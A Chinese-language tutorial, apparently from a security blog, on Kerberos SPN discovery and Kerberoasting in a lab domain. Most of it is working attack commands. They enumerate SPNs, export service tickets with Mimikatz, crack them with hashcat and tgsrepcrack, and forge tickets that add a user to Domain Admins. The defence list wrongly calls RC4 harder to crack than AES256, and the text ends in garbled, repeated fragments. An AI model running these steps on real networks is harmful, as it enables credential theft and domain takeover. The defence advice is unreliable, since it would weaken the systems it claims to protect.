SPN注册发现与利用方法详解<\/h1>

基本概念<\/h2>
SPN（Service Principal Names，服务主体名称）是服务实例（如HTTP、SMB、MySQL、SQLServer等）的唯一标识符。Kerberos认证过程使用SPN将服务实例与服务登录账户相关联。<\/p>

SPN关键特性<\/h3>

使用Kerberos协议认证服务时必须正确配置SPN<\/li>
整个林或域中安装的每个服务实例都必须有自己的SPN<\/li>
一个服务实例可以有多个SPN（如果客户端使用多个名称进行身份验证）<\/li>

一个用户账户下可以有多个SPN，但一个SPN只能注册到一个账户<\/li> <\/ul>

SPN分类<\/h3>

注册在域用户账户下<\/strong>：当服务权限为域用户时<\/li>

注册在机器账户下<\/strong>：当服务权限为Local System或Network Service时<\/li> <\/ol>
SPN语法结构<\/h2>
SPN由以下元素组成：<\/p>
<service class>\/<host>:<port>\/<service name> <\/code><\/pre> 必须元素<\/strong>：<\/p> <service class><\/code>：服务名称标识（如WWW、MySQL、SMTP、MSSQL等）<\/li> <host><\/code>：服务所在主机名（FQDN或NetBIOS名）<\/li> <\/ul> <\/li> 可选元素<\/strong>：<\/p> <port><\/code>：服务端口（默认端口可省略）<\/li> <service name><\/code>：服务名称（可省略）<\/li> <\/ul> <\/li> <\/ul> SPN注册方法<\/h2> 使用setspn<\/code>工具注册SPN（需要root或域管理员权限）：<\/p> setspn -S MySQL\/win7-test.hacke.testlab:3306\/MySQL Al1ex <\/span><\/span><\/code><\/pre>查看用户SPN：<\/p> setspn -L Al1ex <\/span><\/span><\/code><\/pre>删除SPN：<\/p> setspn -D MySQL\/win7-test.hacke.testlab:3306\/MySQL Al1ex <\/span><\/span><\/code><\/pre>SPN发现技术<\/h2> 1. 使用setspn工具<\/h3> 查看所有SPN：<\/p> setspn -Q *\/* <\/span><\/span><\/code><\/pre><\/li> 查看指定域的SPN：<\/p> setspn -T hacke.testlab -Q *\/* <\/span><\/span><\/code><\/pre><\/li> 查找域内重复SPN：<\/p> setspn -X <\/span><\/span><\/code><\/pre><\/li> 查找用户\/主机名SPN：<\/p> setspn -L username\/hostname <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2. 使用Empire框架<\/h3> usemodule situational_awareness\/network\/get_spn <\/span><\/span><\/code><\/pre>3. 使用Impacket工具包<\/h3> .\/GetUserSPNs.py -dc-ip 192.168.188.2 hacke.testlab\/testuser <\/span><\/span><\/code><\/pre>4. 使用PowerSploit框架<\/h3> Import-Module .\PowerView.ps1 <\/span><\/span>Get-NetUser -SPN <\/span><\/span><\/code><\/pre>5. 使用PowerShellery脚本<\/h3> Import-Module .\Get-SPN.ps1 <\/span><\/span>Get-SPN -type service -search "*"<\/span> <\/span><\/span><\/code><\/pre>表格形式展示：<\/p> Get-SPN -type service -search "*"<\/span> -List yes | Format-Table <\/span><\/span><\/code><\/pre>获取UserSID、服务和实际用户：<\/p> Import-Module .\Get-DomainSpn.psm1 <\/span><\/span>Get-DomainSpn <\/span><\/span><\/code><\/pre>6. 使用kerberoast工具包<\/h3> PowerShell脚本：<\/p> powershell_import \/root\/GetUserSPNs.ps1 <\/span><\/span><\/code><\/pre>VBS脚本：<\/p> cscript.exe .\GetUserSPNs.vbs <\/span><\/span><\/code><\/pre>7. 使用PowerShell AD Recon<\/h3> 扫描特定服务：<\/p> # MSSQL服务<\/span> <\/span><\/span>Import-Module .\Discover-PSMSSQLServers.ps1 <\/span><\/span>Discover-PSMSSQLServers <\/span><\/span> <\/span><\/span># Exchange服务<\/span> <\/span><\/span>Import-Module .\Discover-PSMSExchangeServers.ps1 <\/span><\/span>Discover-PSMSExchangeServers <\/span><\/span> <\/span><\/span># 所有SPN信息<\/span> <\/span><\/span>Import-Module .\Discover-PSInterestingServices.ps1 <\/span><\/span>Discover-PSInterestingServices <\/span><\/span><\/code><\/pre>8. 使用RiskySPN工具<\/h3> Import-Module .\Find-PotentiallyCrackableAccounts.ps1 <\/span><\/span>Find-PotentiallyCrackableAccounts -Domain "hacke.testlab"<\/span> <\/span><\/span><\/code><\/pre>SPN利用方法<\/h2> Kerberos认证流程概述<\/h3> 用户发送AS-REQ数据包给KDC进行身份认证<\/li> KDC验证凭据，返回TGT（票据授予票据）<\/li> 用户发起TGS请求，包含TGT和所请求服务的SPN<\/li> TGS创建服务票据，使用服务账户凭据加密<\/li> 用户收到加密服务票据的TGS响应<\/li> 服务票据转发给目标服务，使用服务账户凭据解密<\/li> <\/ol> 攻击思路<\/h3> 查询SPN，找到有价值的SPN（注册在域用户账户下且权限高）<\/li> 请求TGS<\/li> 导出TGS<\/li> 暴力破解<\/li> <\/ol> 攻击步骤<\/h3> 常规实现方法<\/h4> 查询SPN：<\/p> setspn -T hacke.testlab -Q *\/* <\/span><\/span><\/code><\/pre><\/li> 请求TGS：<\/p> Add-Type -AssemblyName System.IdentityModel <\/span><\/span>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc\/win08-server.hacke.testlab"<\/span> <\/span><\/span><\/code><\/pre><\/li> 导出TGS（使用Mimikatz）：<\/p> kerberos::list \/export <\/span><\/span><\/code><\/pre><\/li> 暴力破解：<\/p> python3 tgsrepcrack.py wordlist.txt 1-40810000-testuser@MSSQLSvc~win08-server.hacke.testlab-HACKE.TESTLAB.kirbi <\/span><\/span><\/code><\/pre><\/li> 重写Ticket：<\/p> python3 kerberoast.py -p "1234Rewq!@#<\/span>$"<\/span> -r 1-40810000-testuser@MSSQLSvc~win08-server.hacke.testlab-HACKE.TESTLAB.kirbi -w sql.kirbi -u 500<\/span> <\/span><\/span><\/code><\/pre><\/li> 添加用户到域管理员：<\/p> python3 kerberoast.py -p "1234Rewq!@#<\/span>$"<\/span> -r 1-40810000-testuser@MSSQLSvc~win08-server.hacke.testlab-HACKE.TESTLAB.kirbi -w sql.kirbi -g 512<\/span> <\/span><\/span><\/code><\/pre><\/li> 使用Mimikatz注入：<\/p> kerberos::ptt sql.kirbi <\/span><\/span><\/code><\/pre><\/li> <\/ol> 使用Rubeus工具<\/h4> Rubeus.exe kerberoast <\/span><\/span><\/code><\/pre>使用hashcat破解：<\/p> hashcat -m 13100<\/span> \/root\/hash.txt \/root\/pass.txt --force <\/span><\/span><\/code><\/pre>使用PowerShell方法1<\/h4> Import-Module .\Invoke-Kerberoast.ps1 <\/span><\/span>Invoke-Kerberoast -OutputFormat Hashcat > 1.txt <\/span><\/span><\/code><\/pre>使用hashcat破解：<\/p> hashcat -m 13100<\/span> \/root\/hash.txt \/root\/pass.txt --force <\/span><\/span><\/code><\/pre>使用PowerShell方法2（autokerberoast.ps1）<\/h4> 查看所有SPN信息：<\/p> List-UserSPNs <\/span><\/span><\/code><\/pre><\/li> 查看与域管理员关联的SPN：<\/p> List-UserSPNs -GroupName "Domain Admins"<\/span> <\/span><\/span><\/code><\/pre><\/li> 查看指定域名的SPN：<\/p> List-UserSPNs -Domain "hacke.testlab"<\/span> <\/span><\/span><\/code><\/pre><\/li> 获取所有票证：<\/p> Invoke-AutoKerberoast <\/span><\/span><\/code><\/pre><\/li> 从Ticket中提取hash：<\/p> python autoKirbi2hashcat.py hash.txt <\/span><\/span><\/code><\/pre><\/li> <\/ul> 使用Empire框架<\/h4> usemodule credentials\/invoke_kerberoast <\/span><\/span>set Agent [AgentName]<\/span> <\/span><\/span>execute <\/span><\/span><\/code><\/pre>防御措施<\/h2> 将默认的AES256_HMAC加密方式改为RC4_HMAC_MD5，增加破解难度<\/li> 确保服务密码本身为强密码<\/li> 定期审计SPN配置<\/li> 监控异常SPN查询行为<\/li> 限制普通用户注册SPN的权限<\/li> <\/ol> 通过以上措施可以有效防御SPN相关的攻击，特别是Kerberoasting攻击。<\/p>

SPN注册发现与利用方法详解<\/h1>

基本概念<\/h2> SPN（Service Principal Names，服务主体名称）是服务实例（如HTTP、SMB、MySQL、SQLServer等）的唯一标识符。Kerberos认证过程使用SPN将服务实例与服务登录账户相关联。<\/p>

SPN发现技术<\/h2>

SPN利用方法<\/h2>

攻击步骤<\/h3>

基本概念<\/h2>
SPN（Service Principal Names，服务主体名称）是服务实例（如HTTP、SMB、MySQL、SQLServer等）的唯一标识符。Kerberos认证过程使用SPN将服务实例与服务登录账户相关联。<\/p>